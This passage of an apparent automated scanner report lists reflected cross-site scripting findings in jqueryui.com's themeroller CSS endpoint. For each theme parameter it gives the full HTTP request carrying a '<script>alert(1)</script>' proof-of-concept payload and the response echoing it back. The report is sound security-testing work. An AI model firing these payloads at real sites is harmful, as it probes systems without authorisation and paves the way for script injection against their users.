Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121b04a7<script>alert(1)</script>bbbf43f1841&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget inp
...[SNIP]...

3.132. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ffDefault request parameter is copied into the HTML document as plain text between tags. The payload 22354<script>alert(1)</script>88ba43d4577 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif22354<script>alert(1)</script>88ba43d4577&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif22354<script>alert(1)</script>88ba43d4577&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.133. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefault request parameter is copied into the HTML document as plain text between tags. The payload f7d5c<script>alert(1)</script>a45f3b7d724 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1emf7d5c<script>alert(1)</script>a45f3b7d724&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1emf7d5c<script>alert(1)</script>a45f3b7d724&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.134. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fwDefault request parameter is copied into the HTML document as plain text between tags. The payload 577ef<script>alert(1)</script>e138d86eb4c was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal577ef<script>alert(1)</script>e138d86eb4c&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17401


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal577ef<script>alert(1)</script>e138d86eb4c&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.135. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorActive request parameter is copied into the HTML document as plain text between tags. The payload e1406<script>alert(1)</script>bdab54bbfea was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545e1406<script>alert(1)</script>bdab54bbfea&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545e1406<script>alert(1)</script>bdab54bbfea&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget sele
...[SNIP]...

3.136. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorContent request parameter is copied into the HTML document as plain text between tags. The payload 498fa<script>alert(1)</script>150ef89942d was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222498fa<script>alert(1)</script>150ef89942d&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222498fa<script>alert(1)</script>150ef89942d&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.137. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 4487a<script>alert(1)</script>5ee7c8ec65f was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888884487a<script>alert(1)</script>5ee7c8ec65f&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888884487a<script>alert(1)</script>5ee7c8ec65f&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
---------------
...[SNIP]...

3.138. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHeader request parameter is copied into the HTML document as plain text between tags. The payload baa37<script>alert(1)</script>5121dc7b14b was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222baa37<script>alert(1)</script>5121dc7b14b&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpa